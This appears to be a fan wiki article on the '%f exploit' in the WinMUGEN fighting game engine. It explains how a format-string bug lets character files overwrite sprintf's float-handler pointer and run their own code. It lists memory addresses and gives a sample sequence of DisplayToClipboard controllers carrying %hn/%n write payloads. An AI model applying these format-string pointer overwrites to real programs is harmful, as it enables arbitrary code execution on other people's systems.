%f Exploit, technically known as M.U.G.E.N sprintf Float Format Handler Call Redirection, is an exploit in WinMUGEN that allows a character to actively execute arbitrary code during matches.
Considered as the first exploit that allowed to arbitrary code execution, as authors could easily redirect sprintf's float handler, cfltcvt, to their code by setting its pointer value to theirs, allowing their character to defeat the enemy effortlessly.
Exploit Details[]
Some developers can decide to stastically link specific libraries to their program in order to make them more portable and self-contained, so you can guess what decision the Elecbyte developers team chose when compiling this engine build back then. This should not be a real problem to take into consideration, but since the %n bug is present in the engine's code, it can result in possible arbitrary code execution as certain local pointers may refer to an active library's function handler.
One of the functions MUGEN actively uses to process text strings, sprintf, contains several functions that can be redirected to execute code. When an input string with a float format specifier (%f, %g, %e) is processed by this function, the latter calls a handler, cfltcvt, from a pointer that can be tampered with to execute a character's shellcode. Most characters use a DisplayToClipboard state controller that contains such a format specifier to actively call the previously mentioned handler but, if the shellcode is not carefully programmed, it will cause the matches to display abnormal behavior as executed at the end of every frame when the FPS value is written to the debug clipboard.
An example of several DisplayToClipboard state controllers used to modify cfltcvt's pointer (located at 0x004B48E8) for code redirection:
[State Sample_Code (INT3)] Type = DisplayToClipboard Trigger1 = 1 Text = "%204u%hn" Params = 1, 4925504 [State Redirection] Type = DisplayToClipboard Trigger1 = 1 Text = "%64u%hn" Params = 1, 4933864 [State Redirection] Type = DisplayToClipboard Trigger1 = 1 Text = "%40u%n" Params = 1, 4933865 [State Redirection] Type = DisplayToClipboard Trigger1 = 1 Text = "%75u%hn" Params = 1, 4933866 [State Active Float Handler Call] Type = DisplayToClipboard Trigger1 = 1 Text = "%f" Params = Pos X
Other, similar methods to execute code can be performed by tampering with the pointer for sprintf's other float-related functions. Namely, redirecting cropzeros (located at 0x004B48EC) allows for code execution only when %g or %e are used, and redirecting forcdecpt (located at 0x004B48F4) allows for code execution only when the # flag is specified within any of these format specifiers.
1.0/1.1[]
As the main MSVCRT functions of M.U.G.E.N 1.0 and higher are dynamically linked, this exploit is limited to WinMUGEN.